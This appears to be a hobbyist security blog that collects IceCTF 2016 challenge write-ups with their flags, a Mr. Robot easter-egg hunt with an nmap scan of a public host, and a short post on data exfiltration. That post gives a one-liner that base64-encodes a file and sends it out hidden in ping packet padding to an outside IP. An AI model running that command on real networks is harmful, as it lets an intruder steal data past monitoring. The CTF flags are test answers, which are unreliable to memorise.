And of course, the flag: IceCTF{t1s_but_4_5cr4tch}

IceCTF 2016 - Vape Nation

Challenge description:

Go Green!

They provide a png called vape_nation.png:

vape nation

With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

solved nation

Looks like a flag :)

IceCTF{420_CuR35_c4NCEr}

IceCTF 2016 - Demo

Challenge description:

I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell. The source for this challenge was provided:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>

void give_shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
        give_shell();
    }
    else {
        printf("I'm sorry, your free trial has ended.\n");
    }
    return 0;
}

So to get the flag we need to make the _ shell variable equal icesh. The _ shell variable in bash is always set to the program name of the command being run. So I decided to use a different shell to see what would happen.

sh
ls icesh; /home/demo/demo
cat flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

Mr. Robot Season 2 Episode 4 Easter Egg

After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IP's and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53. ip

I decided to scan that host with nmap and got the following results:

β†’ sudo nmap -sS -Pn -sV -n 192.251.68.253
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
Nmap scan report for 192.251.68.253
Host is up (0.023s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp?
80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
554/tcp  open  rtsp?
7070/tcp open  realserver?
Service Info: Device: load balancer

HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net: irc

After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the roll of Darlene and entered what she said in the show: input

Here is the respone I got: response

they have changed their standard issue. we have a way in.

What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

Data Exfiltration with Ping

I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

Sending data

base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done

This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

Obviously you should change the IP before sending :)

Receiving data

You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

That's all for now.

Hello World

Finally finished this new blog. It's all static now so that's good.

I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

❌